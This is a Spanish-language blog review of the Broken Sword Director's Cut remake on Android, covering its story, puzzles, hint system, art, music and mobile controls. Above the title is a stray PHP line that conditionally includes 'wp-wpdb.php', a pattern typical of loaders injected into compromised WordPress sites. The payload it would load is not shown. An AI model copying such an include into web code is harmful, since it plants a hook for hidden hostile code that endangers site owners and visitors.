if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Broken Sword: La leyenda de los templarios – La Fortaleza de LeChuck

Análisis Broken Sword: La leyenda de los templarios

Hace unos días Guybrush me mostró en su tablet el último juego que acababa de descargar, se trataba de Broken Sword: La leyenda de los templarios. Cuando lo vi se me abrieron los ojos, recordé cuando en su día no pude finalizarlo y ahora se presentaba ante mi una nueva y cómoda oportunidad de retomarlo, esta vez en su remake llamado «El montaje del director». Debo decir que enseguida me enganché y en varias noches lo finiquité. Que mejor hoy, después de la noticia del kickstarter para nuevo Broken Sword «The Serpent’s Curse Adventure«, que presentaros el análisis del primero de la saga.

El primer Broken Sword fue publicado en 1996 por Charles Cecil dentro de Revolution Software para PC. Su calidad gráfica y de guión lo catapultaron al éxito, por lo que se decidió lanzarse tiempo después en Playstation. En 2009, Revolution Software hizo un remake del clásico titulándolo: Broken Sword: La Leyenda de los Templarios, “Montaje del Director” para Wii y DS, y en 2010 fue lanzado en PC y en dispositivos IOS. Finalmente este año ha llegado a Android, por lo que he podido retomar el juego desde una Galaxy Tab.

Al comienzo de Broken Sword, y a diferencia del original, manejaremos a Nicole Collard, la intrépida periodista, y posterior compañera del protagonista, que investiga la misteriosa muerte de un millonario. Aprenderemos más de sus motivos y ambiciones que en el original quedaron un poco en la sombra. Esta introducción de media hora de duración es una muestra considerable del genial contenido adicional de la nueva versión.
Podremos llevar a Nico y descubrir hechos insólitos
Después de las pesquisas de Nico, nos pondremos en el papel de George Stobbart, un estadounidense que está disfrutando de sus vacaciones en un café al aire libre en Paris cuando un sospechoso vestido de payaso entra en la cafetería y se va rápidamente. Momentos después el café vuela por los aires, dejando a un hombre muerto. La policía llega a la escena, pero al comprobar la ineptitud de los agentes, George decide investigar por su cuenta. La historia toma otro cáliz cuando se descubre que el bombardeo está conectado a un oscuro secreto y tesoro de la legendaria orden de los Caballeros Templarios.
Por los pelos George no sale también por los aires

Broken Sword: La leyenda de los Templarios es un juego clásico point-and-click. Como siempre nuestro deber será encontrar, usar y combinar objetos, y dialogar con otros personajes y extraerles la información adecuada. No dispondremos de un gran inventario, pero algunos objetos serán muy versátiles, como la llave de las alcantarillas, ¡No os podéis ni imaginar la de usos que tiene! Sin embargo, lo que me resultó más divertido de la aventura, y me reía como una imbécil, era ir ofreciendo todo lo que contenía mi inventario a los personajes que me encontraba. Las respuestas eran diferentes en todo caso, desde tratarme de anormal hasta seguirme la corriente. En serio, me partía de risa sola. En la parte del hospital fue un descojone padre.

Con Broken Sword “El montaje del director” atrás quedaron los días haciendo clics desesperados por toda la pantalla. El cursor señala los objetos en el escenario con puntos luminosos o lugares de importancia con el símbolo de la lupa (examinar), una mano (coger), o unos engranajes (usar). Además el nuevo sistema de pistas favorece que no abandonemos y odiemos el juego para siempre. La nueva versión tambien incluye nuevos acertijos, además de los gráficos de los rostros de los personajes durante los diálogos, donde podremos comprobar su expresión en todo momento.
¡Habemus fiambre!

Los personajes se mueven con fluidez, el diálogo es creíble, y los detalles muy logrados. Los gráficos son brillantes y han sido pintados a mano utilizando técnicas clásicas de animación por artistas de importantes estudios. Los personajes y objetos se animan por separado, y luego son superpuestos y pre-renderizados para permitir el control en tiempo real.

La estupenda música que acompaña a la aventura es por obra de Barrington Pheloung e interpretada por la Orquesta Metropolitana de Londres. Esto, junto con la amplia cantidad de sonidos ambientales (camiones que pasan por la calle, música de piano en el hotel), proporcionan el ambiente necesario para una completa inmersión en el juego. Las voces han sido regrabadas para la ocasión.

A pesar de la complejidad del tema que involucra a la orden de los Caballeros Templarios, el guion del juego no para nada enrevesado y su calidad es comparable al de una novela o una película de aventuras. Hay muchas partes de humor que se suman al buen ritmo del juego. Sin embargo, podemos morir fácilmente si no tenemos cuidado.
En Broken Sword haremos un rápido tour por varios países: Francia, Irlanda, España, Siria y Escocia. Además de la aventura principal, también hay una subtrama romántica entre George y su interés por Nicole que actuará en todo momento como confidente.
Algunas partes del juego son bastante lineales, una vez que se llega a una nueva ubicación, el jugador tiene que completar todos los puzzles en esa zona antes de que pueda salir. No hay opción de retroceder entre los lugares clave. Algunos de los puzles son bastante toca pelotas y basados en el tiempo (el de cabra ha traido más de un quebradero de cabeza).
Recorreremos Paris y también podremos realizar viajes express a otras ciudades

La llegada a dispositivos móviles, y a bajo precio, otorgan facilidad y comodidad a la experiencia. Puedes jugar en cualquier lugar, en cualquier postura (tumbado, recostado, haciendo el pino…) ya que simplemente has de arrastrar o tocar la pantalla. Esta traducido y doblado al castellano, aquí podéis ver el tráiler:

Broken Sword: La leyenda de los templarios, muestra un delicado equilibrio entre la historia, los gráficos y el sonido. La interfaz y los puzles son testimonio de los esfuerzos de su creador para convertir este título en uno de nuestros favoritos del género. Un “Must” para cualquier amante de los juegos de aventuras.